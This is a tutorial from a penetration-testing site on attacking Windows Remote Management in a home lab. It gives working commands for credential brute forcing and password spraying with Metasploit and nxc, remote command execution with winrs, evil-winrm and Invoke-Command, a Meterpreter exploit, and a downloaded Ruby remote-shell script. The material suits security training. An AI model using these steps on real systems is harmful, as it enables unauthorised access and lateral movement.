www.hackingarticles.
in
�Contents
Lab Setup ....................................................................................................... 3
Testing the connection................................................................................... 6
Lateral Movement (Locally) ........................................................................... 6
Connecting server using Enter-PSSession ....................................................... 7
Connecting server using winrs ....................................................................... 8
Connecting server using Powershell ............................................................... 8
Lateral Movement (Remotely) ....................................................................... 9
Identifying the WinRM authentication methods .......................................... 10
WinRM login brute force.............................................................................. 10
Password spray using nxc ............................................................................ 13
Exploiting WinRM using Metasploit ............................................................. 14
Connecting remote shell using docker ......................................................... 17
Connecting remote shell using Ruby script ................................................... 17
Conclusion ................................................................................................... 20
www.hackingarticles.in
�Windows Remote Management (WinRM) is a protocol developed by Microsoft
for remotely managing hardware and operating systems on Windows machines.
It is a component of the Windows Management Framework and implements the
WS-Management Protocol, which is a standard web services protocol designed
for remote management of software and hardware. WS-Management is based
on SOAP and supports the XML schema. WinRM uses port 5985 for HTTP
transport and 5986 for HTTPS Transport.
Table of Contents
• Lab Setup
• Testing the connection
• Lateral Movement (Locally)
o Connecting server using Enter-PSSession
o Connecting server using winrs
o Connecting server using PowerShell
• Lateral Movement (Remotely)
o Scanning
o Identifying the WinRM authentication methods
o WinRM login brute force
o Password spray using nxc
o Exploiting WinRM using Metasploit
• Connecting remote shell using docker
• Connecting remote shell using Ruby script
• Conclusion
Lab Setup
Target Machine: Windows Server 2019 (192.168.31.70)
Standalone Individual Machine: Windows 10
Attacker Machine: Kali Linux (192.168.31.141)
www.hackingarticles.in
�To Perform lab setup, we need to enable and configure the WinRM service on
both the server and an individual machine. Here we are using the Windows 10
as an individual machine and the server as Windows Server 2019.
First we will configure the WinRM using PowerShell on the Windows Server
2019, the following procedure can be used:
1. Execution Policy Bypass:
In order to run some scripts or perform any task the execution policy needs to
be bypassed. This method does not change the system-wide execution policy
and only applies to the current PowerShell session. Following is the command:
powershell -ep bypass
2. Enable-PSRemoting:
The Enable-PSRemoting cmdlet configures the computer to receive PowerShell
remote commands that are sent by using the WS-Management technology.
Following is the command:
Enable-PSRemoting -force
3. WinRM config:
By default, WinRM listens on port 5985 for HTTP and 5986 for HTTPS. Also, there
is a flexibility to allow connections from specific remote hosts. Here we are using
the wildcard character (*) for all the machines on the network. Following are the
commands:
winrm quickconfig -transport:https
Set-Item wsman:\localhost\client\trustedhosts *
4. Restart service:
After the configuration is complete, now the service can be restarted using the
following command:
Restart-Service WinRM
www.hackingarticles.in
�There is one more configuration that we need to do is to add the administrator
user in the local group Remote Management Users.
Now to configure on the individual machine, we are going to perform the same
action which we followed in case of server configuration. It can be noticed that
Enable-PSRemoting command gives an error however the command will be
executed successfully.
www.hackingarticles.in
�Testing the connection
We can check the connection using test-wsman, if the connection is successful
then the command will return the version details.
test-wsman -computername "192.168.31.70"
Lateral Movement (Locally)
Since the service is active, now we can try different ways to move laterally by
directly using the WinRM service. Here we are assuming that we have already
www.hackingarticles.in
�obtained the initial access in the system as a user now we are trying to move
laterally.
Connecting server using Enter-PSSession
The Enter-PSSession can be used to connect to the remote server using the
ComputerName parameter which is the machine we want to connect and the
Credential as the account name which is trusted for remote connections. Once
the connection is maintained we can run the system commands.
Enter-PSSession -ComputerName 192.168.31.70 -Credential administrator
Systeminfo
www.hackingarticles.in
�Connecting server using winrs
winrs is another command which uses WinRM service to connect to remote
systems and execute the commands.
winrs -r:192.168.31.70 -u:workstation\administrator -p:Ignite@987 ipconfig
It can also be used to get an interactive shell where we can run the commands
afterwards directly.
winrs -r:192.168.31.70 -u:workstation\administrator -p:Ignite@987 CMD
Connecting server using Powershell
There is one more method to connect using the powershell Invoke-Command,
here we need to give the host in the ComputerName parameter, account name
in the Credential parameter and the Authentication type is set as Negotiate.
When we use Negotiate, it means that PowerShell will initially use the Kerberos
authentication if not successful it will fall back to NTLM. However, for the
systems which are not in domain environment, we need to give the Credential.
Here we can give the command in the ScriptBlock parameter.
Invoke-Command -ComputerName "192.168.31.70" -Credential workgroup\administrator -
Authentication Negotiate -Port 5985 -ScriptBlock {net user administrator}
www.hackingarticles.in
�We can also create an object as cred which will take the pass as an argument.
To create a SecureString we need to give the -AsPlainText and -Force
parameters otherwise it will give an error. The created pass string can be passed
as a variable in the cred object created using the
System.Management.Automatic namespace using the PSCredential class.
$pass = ConvertTo-SecureString 'Ignite@987' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential
('workstation\administrator', $pass)
Invoke-Command -ComputerName 192.168.31.70 -Credential $cred -ScriptBlock { ipconfig }
Lateral Movement (Remotely)
Scanning
To connect with the WinRM service remotely, first we need to perform the
enumeration.
nmap -p5985,5986 -sV 192.168.31.70
It can be seen that the port 5985 is open and it supports the HTTP for WinRM
connections.
www.hackingarticles.in
�Identifying the WinRM authentication methods
The winrm_auth_methods auxiliary in Metasploit module can be used to
determine the authentication methods. If the WinRM is supported this auxiliary
will
use auxiliary/scanner/winrm/winrm_auth_methods
set rhosts 192.168.31.70
run
WinRM login brute force
The brute force on WinRM can also be performed to enumerate the successful
credentials. Here we are using the auxiliary/scanner/winrm/winrm_login
inside Metasploit module. Here we are keeping the DOMAIN as default i.e.,
WORKSTATION. We can specify the usernames in user_file and the passwords
in the pass_file.
use auxiliary/scanner/winrm/winrm_login
set rhosts 192.168.31.70
set user_file users.txt
set pass_file pass.txt
set password N/A
www.hackingarticles.in
�run
sessions 1
It can be seen that once the valid credentials are found, the session is obtained.
www.hackingarticles.in
�www.hackingarticles.in
�Password spray using nxc
nxc can be used to perform password spray on the WinRM service, we just need
to pass the username and password file as input.
nxc winrm 192.168.31.70 -u users.txt -p pass.txt
Once the valid username and password is obtained we can login into the remote
system using evil-winrm tool.
evil-winrm -i 192.168.31.70 -u administrator -p Ignite@987
We can also directly run the commands by giving the -x flag using nxc, after the
valid credentials are found.
nxc winrm 192.168.31.70 -u administrator -p Ignite@987 -x ipconfig
www.hackingarticles.in
�Exploiting WinRM using Metasploit
Once we have found the valid credentials, we can perform command execution
using the auxiliary/scanner/winrm/winrm_cmd inside Metasploit. Following
are the commands:
use auxiliary/scanner/winrm/winrm_cmd
set cmd ipconfig
set username administrator
set password Ignite@987
run
www.hackingarticles.in
�We can also take the meterpreter session, one we have the valid credentials.
The exploit/windows/winrm/winrm_script_exec can be used to execute the
script. This exploit automatically tries to perform privilege escalation by
migrating to a system level process.
use exploit/windows/winrm/winrm_script_exec
set rhosts 192.168.31.70
set username administrator
set password Ignite@987
run
WQL (WMI Query Language) is a specialized subset of SQL (Structured Query
Language) designed for querying data within the Windows Management
Instrumentation (WMI) framework.
Once valid credentials for the WinRM service are obtained, the WMI
functionality can be exploited to execute arbitrary WQL queries on the target
system. The module will also store the results of these queries as loot.
Here we can give the query to fetch the service Name and Status from the
Win32_Service.
use auxiliary/scanner/winrm/winrm_wql
set rhosts 192.168.31.70
set username administrator
www.hackingarticles.in
�set password Ignite@987
set wql Select Name,Status from Win32_Service
run
www.hackingarticles.in
�Connecting remote shell using docker
We can execute a Docker image of PowerShell with NTLM support to allow for
PS-Remoting from Linux to Windows. After the connection we can supply the
valid credentials and get the session through Enter-PSSession.
docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 192.168.31.70 -Authentication Negotiate -Credential $creds
Connecting remote shell using Ruby script
We can also connect to the remote server which has WinRM enabled using a
ruby script. The script can be downloaded from here:
https://raw.githubusercontent.com/Alamot/code-
snippets/master/winrm/winrm_shell_with_upload.rb
We need to modify this script by giving a valid username, password and
endpoint.
www.hackingarticles.in
�cat winrm_shell_with_upload.rb
www.hackingarticles.in
�www.hackingarticles.in
�Once we have modified the script, we can execute it using ruby.
ruby winrm_shell_with_upload.rb
ipconfig /all
Conclusion
WinRM is a very useful service in day to day tasks, however if not configured
properly it can be abused by attackers to gain shell access. Hence it is
recommended to give the authentication permissions to only trusted users and
not everyone.
Reference:
https://infra.newerasec.com/infrastructure-testing/enumeration/services-
ports/winrm
www.hackingarticles.in
� JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER
Bug Bounty Network Security
Ethical Hacking Essentials
Network Pentest
Wireless Pentest
ADVANCED
Burp Suite Pro Web Pro Computer
Services-API Infrastructure VAPT Forensics
Advanced CTF
Android Pentest Metasploit
EXPERT
Red Team Operation
Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment
www.ignitetechnologies.in
